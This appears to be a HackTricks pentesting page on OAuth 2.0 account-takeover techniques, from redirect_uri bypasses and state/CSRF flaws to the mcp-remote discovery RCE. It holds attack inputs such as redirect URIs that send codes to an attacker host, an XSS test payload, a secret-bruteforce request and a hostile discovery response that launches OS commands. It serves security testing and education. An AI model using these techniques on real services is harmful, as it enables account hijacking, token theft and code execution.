OAuth to Account takeover
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
OAuth offers various versions, with foundational insights accessible at OAuth 2.0 documentation. This discussion primarily centers on the widely used OAuth 2.0 authorization code grant type, providing an authorization framework that enables an application to access or perform actions on a user’s account in another application (the authorization server).
Consider a hypothetical website https://example.com, designed to showcase all your social media posts, including private ones. To achieve this, OAuth 2.0 is employed. https://example.com will request your permission to access your social media posts. Consequently, a consent screen will appear on https://socialmedia.com, outlining the permissions being requested and the developer making the request. Upon your authorization, https://example.com gains the ability to access your posts on your behalf.
It’s essential to grasp the following components within the OAuth 2.0 framework:
- resource owner: You, as the user/entity, authorize access to your resource, like your social media account posts.
- resource server: The server managing authenticated requests after the application has secured an
access tokenon behalf of theresource owner, e.g., https://socialmedia.com. - client application: The application seeking authorization from the
resource owner, such as https://example.com. - authorization server: The server that issues
access tokensto theclient applicationfollowing the successful authentication of theresource ownerand securing authorization, e.g., https://socialmedia.com. - client_id: A public, unique identifier for the application.
- client_secret: A confidential key, known solely to the application and the authorization server, used for generating
access_tokens. - response_type: A value specifying the type of token requested, like
code. - scope: The level of access the
client applicationis requesting from theresource owner. - redirect_uri: The URL to which the user is redirected after authorization. This typically must align with the pre-registered redirect URL.
- state: A parameter to maintain data across the user’s redirection to and from the authorization server. Its uniqueness is critical for serving as a CSRF protection mechanism.
- grant_type: A parameter indicating the grant type and the type of token to be returned.
- code: The authorization code from the
authorization server, used in tandem withclient_idandclient_secretby the client application to acquire anaccess_token. - access_token: The token that the client application uses for API requests on behalf of the
resource owner. - refresh_token: Enables the application to obtain a new
access_tokenwithout re-prompting the user.
Flow
The actual OAuth flow proceeds as follows:
- You navigate to https://example.com and select the “Integrate with Social Media” button.
- The site then sends a request to https://socialmedia.com asking for your authorization to let https://example.com’s application access your posts. The request is structured as:
https://socialmedia.com/auth
?response_type=code
&client_id=example_clientId
&redirect_uri=https%3A%2F%2Fexample.com%2Fcallback
&scope=readPosts
&state=randomString123
- You are then presented with a consent page.
- Following your approval, Social Media sends a response to the
redirect_uriwith thecodeandstateparameters:
https://example.com?code=uniqueCode123&state=randomString123
- https://example.com utilizes this
code, together with itsclient_idandclient_secret, to make a server-side request to obtain anaccess_tokenon your behalf, enabling access to the permissions you consented to:
POST /oauth/access_token
Host: socialmedia.com
...{"client_id": "example_clientId", "client_secret": "example_clientSecret", "code": "uniqueCode123", "grant_type": "authorization_code"}
- Finally, the process concludes as https://example.com employs your
access_tokento make an API call to Social Media to access
Vulnerabilities
Open redirect_uri
Per RFC 6749 §3.1.2, the authorization server must redirect the browser only to pre-registered, exact redirect URIs. Any weakness here lets an attacker send a victim through a malicious authorization URL so that the IdP delivers the victim’s code (and state) straight to an attacker endpoint, who can then redeem it and harvest tokens.
Typical attack workflow:
- Craft
https://idp.example/auth?...&redirect_uri=https://attacker.tld/callbackand send it to the victim. - The victim authenticates and approves the scopes.
- The IdP redirects to
attacker.tld/callback?code=<victim-code>&state=...where the attacker logs the request and immediately exchanges the code.
Common validation bugs to probe:
- No validation – any absolute URL is accepted, resulting in instant code theft.
- Weak substring/regex checks on the host – bypass with lookalikes such as
evilmatch.com,match.com.evil.com,match.com.mx,matchAmatch.com,evil.com#match.com, ormatch.com@evil.com. - IDN homograph mismatches – validation happens on the punycode form (
xn--), but the browser redirects to the Unicode domain controlled by the attacker. - Arbitrary paths on an allowed host – pointing
redirect_urito/openredirect?next=https://attacker.tldor any XSS/user-content endpoint leaks the code either through chained redirects, Referer headers, or injected JavaScript. - Directory constraints without normalization – patterns like
/oauth/*can be bypassed with/oauth/../anything. - Wildcard subdomains – accepting
*.example.commeans any takeover (dangling DNS, S3 bucket, etc.) immediately yields a valid callback. - Non-HTTPS callbacks – letting
http://URIs through gives network attackers (Wi-Fi, corporate proxy) the opportunity to snatch the code in transit.
Also review auxiliary redirect-style parameters (client_uri, policy_uri, tos_uri, initiate_login_uri, etc.) and the OpenID discovery document (/.well-known/openid-configuration) for additional endpoints that might inherit the same validation bugs.
Redirect token leakage on allowlisted domains with attacker-controlled subpaths
Locking redirect_uri to “owned/first-party domains” doesn’t help if any allowlisted domain exposes attacker-controlled paths or execution contexts (legacy app platforms, user namespaces, CMS uploads, etc.). If the OAuth/federated login flow returns tokens in the URL (query or hash), an attacker can:
- Start a legitimate flow to mint a pre-token (e.g., an
etokenin a multi-step Accounts Center/FXAuth flow). - Send the victim an authorization URL that sets the allowlisted domain as
redirect_uri/base_uribut pointsnext/path into an attacker-controlled namespace (e.g.,https://apps.facebook.com/<attacker_app>). - After the victim approves, the IdP redirects to the attacker-controlled path with sensitive values in the URL (
token,blob, codes, etc.). - JavaScript on that page reads
window.locationand exfiltrates the values despite the domain being “trusted.” - Replay the captured values against downstream privileged endpoints that only expect the redirect-carried tokens. Examples from the FXAuth flow:
# Account linking without further prompts
https://accountscenter.facebook.com/add/?auth_flow=frl_linking&blob=<BLOB>&token=<TOKEN>
# Reauth-gated actions (e.g., profile updates) without user confirmation
https://accountscenter.facebook.com/profiles/<VICTIM_ID>/name/?auth_flow=reauth&blob=<BLOB>&token=<TOKEN>
XSS in redirect implementation
As mentioned in this bug bounty report https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html it might be possible that the redirect URL is being reflected in the response of the server after the user authenticates, being vulnerable to XSS. Possible payload to test:
https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</script><h1>test</h1>
CSRF - Improper handling of state parameter
The state parameter is the Authorization Code flow CSRF token: the client must generate a cryptographically random value per browser instance, persist it somewhere only that browser can read (cookie, local storage, etc.), send it in the authorization request, and reject any response that does not return the same value. Whenever the value is static, predictable, optional, or not tied to the user’s session, the attacker can finish their own OAuth flow, capture the final ?code= request (without sending it), and later coerce a victim browser into replaying that request so the victim account becomes linked to the attacker’s identity provider profile.
The replay pattern is always the same:
- The attacker authenticates against the IdP with their account and intercepts the last redirect containing
code(and anystate). - They drop that request, keep the URL, and later abuse any CSRF primitive (link, iframe, auto-submitting form) to force the victim browser to load it.
- If the client does not enforce
state, the application consumes the attacker’s authorization result and logs the attacker into the victim’s app account.
A practical checklist for state handling during tests:
- Missing
stateentirely – if the parameter never appears, the whole login is CSRFable. statenot required – remove it from the initial request; if the IdP still issues codes that the client accepts, the defense is opt-in.- Returned
statenot validated – tamper with the value in the response (Burp, MITM proxy). Accepting mismatched values means the stored token is never compared. - Predictable or purely data-driven
state– many apps stuff redirect paths or JSON blobs intostatewithout mixing in randomness, letting attackers guess valid values and replay flows. Always prepend/append strong entropy before encoding data. statefixation – if the app lets users supply thestatevalue (e.g., via crafted authorization URLs) and reuses it throughout the flow, an attacker can lock in a known value and reuse it across victims.
PKCE can complement state (especially for public clients) by binding the authorization code to a code verifier, but web clients must still track state to prevent cross-user CSRF/account-linking bugs.
Pre Account Takeover
- Without Email Verification on Account Creation: Attackers can preemptively create an account using the victim’s email. If the victim later uses a third-party service for login, the application might inadvertently link this third-party account to the attacker’s pre-created account, leading to unauthorized access.
- Exploiting Lax OAuth Email Verification: Attackers may exploit OAuth services that don’t verify emails by registering with their service and then changing the account email to the victim’s. This method similarly risks unauthorized account access, akin to the first scenario but through a different attack vector.
Disclosure of Secrets
The client_id is intentionally public, but the client_secret must never be recoverable by end users. Authorization Code deployments that embed the secret in mobile APKs, desktop clients, or single-page apps effectively hand that credential to anyone who can download the package. Always inspect public clients by:
- Unpacking the APK/IPA, desktop installer, or Electron app and grepping for
client_secret, Base64 blobs that decode to JSON, or hard-coded OAuth endpoints. - Reviewing bundled config files (plist, JSON, XML) or decompiled strings for client credentials.
Once the attacker extracts the secret they only need to steal any victim authorization code (via a weak redirect_uri, logs, etc.) to independently hit /token and mint access/refresh tokens without involving the legitimate app. Treat public/native clients as incapable of holding secrets—they should instead rely on PKCE (RFC 7636) to prove possession of a per-instance code verifier instead of a static secret. During testing, confirm whether PKCE is mandatory and whether the backend actually rejects token exchanges that omit either the client_secret or a valid code_verifier.
Client Secret Bruteforce
You can try to bruteforce the client_secret of a service provider with the identity provider in order to be try to steal accounts.
The request to BF may look similar to:
POST /token HTTP/1.1
content-type: application/x-www-form-urlencoded
host: 10.10.10.10:3000
content-length: 135
Connection: close
code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=authorization_code&client_id=public_client_id&client_secret=[bruteforce]
Referer/Header/Location artifacts leaking Code + State
Once the client has the code and state, if they surface in location.href or document.referrer and are forwarded to third parties, they leak. Two recurring patterns:
- Classic Referer leak: after the OAuth redirect, any navigation that keeps
?code=&state=in the URL will push them into the Referer header sent to CDNs/analytics/ads. - Telemetry/analytics confused deputy: some SDKs (pixels/JS loggers) react to
postMessageevents and then send the currentlocation.href/referrerto backend APIs using a token supplied in the message. If you can inject your own token into that flow (e.g., via an attacker-controlled postMessage relay), you can later read the SDK’s API request history/logs and recover the victim’s OAuth artifacts embedded in those requests.
Access Token Stored in Browser History
The core guarantee of the Authorization Code grant is that access tokens never reach the resource owner’s browser. When implementations leak tokens client-side, any minor bug (XSS, Referer leak, proxy logging) becomes instant account compromise. Always check for:
- Tokens in URLs – if
access_tokenappears in the query/fragment, it lands in browser history, server logs, analytics, and Referer headers sent to third parties. - Tokens transiting untrusted middleboxes – returning tokens over HTTP or through debugging/corporate proxies lets network observers capture them directly.
- Tokens stored in JavaScript state – React/Vue stores, global variables, or serialized JSON blobs expose tokens to every script on the origin (including XSS payloads or malicious extensions).
- Tokens persisted in Web Storage –
localStorage/sessionStorageretain tokens long after logout on shared devices and are script-accessible.
Any of these findings usually upgrades otherwise “low” bugs (like a CSP bypass or DOM XSS) into full API takeover because the attacker can simply read and replay the leaked bearer token.
Everlasting Authorization Code
Authorization codes must be short-lived, single-use, and replay-aware. When assessing a flow, capture a code and:
- Test the lifetime – RFC 6749 recommends minutes, not hours. Try redeeming the code after 5–10 minutes; if it still works, the exposure window for any leaked code is excessive.
- Test sequential reuse – send the same
codetwice. If the second request yields another token, attackers can clone sessions indefinitely. - Test concurrent redemption/race conditions – fire two token requests in parallel (Burp intruder, turbo intruder). Weak issuers sometimes grant both.
- Observe replay handling – a reuse attempt should not only fail but also revoke any tokens already minted from that code. Otherwise, a detected replay leaves the attacker’s first token active.
Combining a replay-friendly code with any redirect_uri or logging bug allows persistent account access even after the victim completes the legitimate login.
Authorization/Refresh Token not bound to client
If you can get the authorization code and redeem it for a different client/app, you can takeover other accounts. Test for weak binding by:
- Capturing a
codefor app A and sending it to app B’s token endpoint; if you still receive a token, audience binding is broken. - Trying first-party token minting endpoints that should be restricted to their own client IDs; if they accept arbitrary
state/app_idwhile only validating the code, you effectively perform an authorization-code swap to mint higher-privileged first-party tokens. - Checking whether client binding ignores nonce/redirect URI mismatches. If an error page still loads SDKs that log
location.href, combine with Referer/telemetry leaks to steal codes and redeem them elsewhere.
Any endpoint that exchanges code → token must verify the issuing client, redirect URI, and nonce; otherwise, a stolen code from any app can be upgraded to a first-party access token.
Happy Paths, XSS, Iframes & Post Messages to leak code & state values
AWS Cognito
In this bug bounty report: https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/ you can see that the token that AWS Cognito gives back to the user might have enough permissions to overwrite the user data. Therefore, if you can change the user email for a different user email, you might be able to take over others accounts.
# Read info of the user
aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
# Change email address
aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ[...] --user-attributes Name=email,Value=imaginary@flickr.com
{
"CodeDeliveryDetailsList": [
{
"Destination": "i***@f***.com",
"DeliveryMedium": "EMAIL",
"AttributeName": "email"
}
]
}
For more detailed info about how to abuse AWS Cognito check AWS Cognito - Unauthenticated Enum Access.
Abusing other Apps tokens
As mentioned in this writeup, OAuth flows that expect to receive the token (and not a code) could be vulnerable if they not check that the token belongs to the app.
This is because an attacker could create an application supporting OAuth and login with Facebook (for example) in his own application. Then, once a victim logins with Facebook in the attackers application, the attacker could get the OAuth token of the user given to his application, and use it to login in the victim OAuth application using the victims user token.
Caution
Therefore, if the attacker manages to get the user access his own OAuth application, he will be able to take over the victims account in applications that are expecting a token and aren’t checking if the token was granted to their app ID.
Two links & cookie
According to this writeup, it was possible to make a victim open a page with a returnUrl pointing to the attackers host. This info would be stored in a cookie (RU) and in a later step the prompt will ask the user if he wants to give access to that attackers host.
To bypass this prompt, it was possible to open a tab to initiate the Oauth flow that would set this RU cookie using the returnUrl, close the tab before the prompt is shown, and open a new tab without that value. Then, the prompt won’t inform about the attackers host, but the cookie would be set to it, so the token will be sent to the attackers host in the redirection.
Prompt Interaction Bypass
As explained in this video, some OAuth implementations allows to indicate the prompt GET parameter as None (&prompt=none) to prevent users being asked to confirm the given access in a prompt in the web if they are already logged in the platform.
response_mode
As explained in this video, it might be possible to indicate the parameter response_mode to indicate where do you want the code to be provided in the final URL:
response_mode=query-> The code is provided inside a GET parameter:?code=2397rf3gu93fresponse_mode=fragment-> The code is provided inside the URL fragment parameter#code=2397rf3gu93fresponse_mode=form_post-> The code is provided inside a POST form with an input calledcodeand the valueresponse_mode=web_message-> The code is send in a post message:window.opener.postMessage({"code": "asdasdasd...
Clickjacking OAuth consent dialogs
OAuth consent/login dialogs are ideal clickjacking targets: if they can be framed, an attacker can overlay custom graphics, hide the real buttons, and trick users into approving dangerous scopes or linking accounts. Build PoCs that:
- Load the IdP authorization URL inside an
<iframe sandbox="allow-forms allow-scripts allow-same-origin">. - Use absolute positioning/opacity tricks to align fake buttons with the hidden Allow/Approve controls.
- Optionally pre-fill parameters (scopes, redirect URI) so the stolen approval immediately benefits the attacker.
During testing verify that IdP pages emit either X-Frame-Options: DENY/SAMEORIGIN or a restrictive Content-Security-Policy: frame-ancestors 'none'. If neither is present, demonstrate the risk with tooling like NCC Group’s clickjacking PoC generator and record how easily a victim authorizes the attacker’s app. For additional payload ideas see Clickjacking.
OAuth ROPC flow - 2 FA bypass
According to this blog post, this is an OAuth flow that allows to login in OAuth via username and password. If during this simple flow a token with access to all the actions the user can perform is returned then it’s possible to bypass 2FA using that token.
ATO on web page redirecting based on open redirect to referrer
This blogpost comments how it was possible to abuse an open redirect to the value from the referrer to abuse OAuth to ATO. The attack was:
- Victim access the attackers web page
- The victim opens the malicious link and an opener starts the Google OAuth flow with
response_type=id_token,code&prompt=noneas additional parameters using as referrer the attackers website. - In the opener, after the provider authorizes the victim, it sends them back to the value of the
redirect_uriparameter (victim web) with 30X code which still keeps the attackers website in the referer. - The victim website trigger the open redirect based on the referrer redirecting the victim user to the attackers website, as the
respose_typewasid_token,code, the code will be sent back to the attacker in the fragment of the URL allowing him to tacke over the account of the user via Google in the victims site.
SSRFs parameters
Check this research For further details of this technique.
Dynamic Client Registration in OAuth serves as a less obvious but critical vector for security vulnerabilities, specifically for Server-Side Request Forgery (SSRF) attacks. This endpoint allows OAuth servers to receive details about client applications, including sensitive URLs that could be exploited.
Key Points:
- Dynamic Client Registration is often mapped to
/registerand accepts details likeclient_name,client_secret,redirect_uris, and URLs for logos or JSON Web Key Sets (JWKs) via POST requests. - This feature adheres to specifications laid out in RFC7591 and OpenID Connect Registration 1.0, which include parameters potentially vulnerable to SSRF.
- The registration process can inadvertently expose servers to SSRF in several ways:
logo_uri: A URL for the client application’s logo that might be fetched by the server, triggering SSRF or leading to XSS if the URL is mishandled.jwks_uri: A URL to the client’s JWK document, which if maliciously crafted, can cause the server to make outbound requests to an attacker-controlled server.sector_identifier_uri: References a JSON array ofredirect_uris, which the server might fetch, creating an SSRF opportunity.request_uris: Lists allowed request URIs for the client, which can be exploited if the server fetches these URIs at the start of the authorization process.
Exploitation Strategy:
- SSRF can be triggered by registering a new client with malicious URLs in parameters like
logo_uri,jwks_uri, orsector_identifier_uri. - While direct exploitation via
request_urismay be mitigated by whitelist controls, supplying a pre-registered, attacker-controlledrequest_urican facilitate SSRF during the authorization phase.
OAuth/OIDC Discovery URL Abuse & OS Command Execution
Research on CVE-2025-6514 (impacting mcp-remote clients such as Claude Desktop, Cursor or Windsurf) shows how dynamic OAuth discovery becomes an RCE primitive whenever the client forwards IdP metadata straight to the operating system. The remote MCP server returns an attacker-controlled authorization_endpoint during the discovery exchange (/.well-known/openid-configuration or any metadata RPC). mcp-remote ≤0.1.15 would then call the system URL handler (start, open, xdg-open, etc.) with whatever string arrived, so any scheme/path supported by the OS executed locally.
Attack workflow
- Point the desktop agent to a hostile MCP/OAuth server (
npx mcp-remote https://evil). The agent receives401plus metadata. - The server answers with JSON such as:
HTTP/1.1 200 OK
Content-Type: application/json
{
"authorization_endpoint": "file:/c:/windows/system32/calc.exe",
"token_endpoint": "https://evil/idp/token",
...
}
- The client launches the OS handler for the supplied URI. Windows accepts payloads like
file:/c:/windows/system32/calc.exe /c"powershell -enc ..."; macOS/Linux acceptfile:///Applications/Calculator.app/...or even custom schemes such ascmd://bash -lc '<payload>'if registered. - Because this happens before any user interaction, merely configuring the client to talk to the attacker server yields code execution.
How to test
- Target any OAuth-capable desktop/agent that performs discovery over HTTP(S) and opens returned endpoints locally (Electron apps, CLI helpers, thick clients).
- Intercept or host the discovery response and replace
authorization_endpoint,device_authorization_endpoint, or similar fields withfile://,cmd://, UNC paths, or other dangerous schemes. - Observe whether the client validates the scheme/host. Lack of validation results in immediate execution under the user context and proves the issue.
- Repeat with different schemes to map the full attack surface (e.g.,
ms-excel:,data:text/html,, custom protocol handlers) and demonstrate cross-platform reach.
OAuth providers Race Conditions
If the platform you are testing is an OAuth provider read this to test for possible Race Conditions.
Mutable Claims Attack
In OAuth, the sub field uniquely identifies a user, but its format varies by Authorization Server. To standardize user identification, some clients use emails or user handles. However, this is risky because:
- Some Authorization Servers do not ensure that these properties (like email) remain immutable.
- In certain implementations—such as “Login with Microsoft”—the client relies on the email field, which is user-controlled by the user in Entra ID and not verified.
- An attacker can exploit this by creating their own Azure AD organization (e.g., doyensectestorg) and using it to perform a Microsoft login.
- Even though the Object ID (stored in sub) is immutable and secure, the reliance on a mutable email field can enable an account takeover (for example, hijacking an account like victim@gmail.com).
Client Confusion Attack
In a Client Confusion Attack, an application using the OAuth Implicit Flow fails to verify that the final access token is specifically generated for its own Client ID. An attacker sets up a public website that uses Google’s OAuth Implicit Flow, tricking thousands of users into logging in and thereby harvesting access tokens intended for the attacker’s site. If these users also have accounts on another vulnerable website that does not validate the token’s Client ID, the attacker can reuse the harvested tokens to impersonate the victims and take over their accounts.
Scope Upgrade Attack
The Authorization Code Grant type involves secure server-to-server communication for transmitting user data. However, if the Authorization Server implicitly trusts a scope parameter in the Access Token Request (a parameter not defined in the RFC), a malicious application could upgrade the privileges of an authorization code by requesting a higher scope. After the Access Token is generated, the Resource Server must verify it: for JWT tokens, this involves checking the JWT signature and extracting data such as client_id and scope, while for random string tokens, the server must query the Authorization Server to retrieve the token’s details.
Redirect Scheme Hijacking
In mobile OAuth implementations, apps use custom URI schemes to receive redirects with Authorization Codes. However, because multiple apps can register the same scheme on a device, the assumption that only the legitimate client controls the redirect URI is violated. On Android, for instance, an Intent URI like com.example.app:// oauth is caught based on the scheme and optional filters defined in an app’s intent-filter. Since Android’s intent resolution can be broad—especially if only the scheme is specified—an attacker can register a malicious app with a carefully crafted intent filter to hijack the authorization code. This can enable an account takeover either through user interaction (when multiple apps are eligible to handle the intent) or via bypass techniques that exploit overly specific filters, as detailed by Ostorlab’s assessment flowchart.
References
- Leaking FXAuth token via allowlisted Meta domains
- https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1
- https://portswigger.net/research/hidden-oauth-attack-vectors
- https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html
- An Offensive Guide to the OAuth 2.0 Authorization Code Grant
- OAuth Discovery as an RCE Vector (Amla Labs)
- Leaking fbevents: OAuth code exfiltration via postMessage trust leading to Instagram ATO
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.


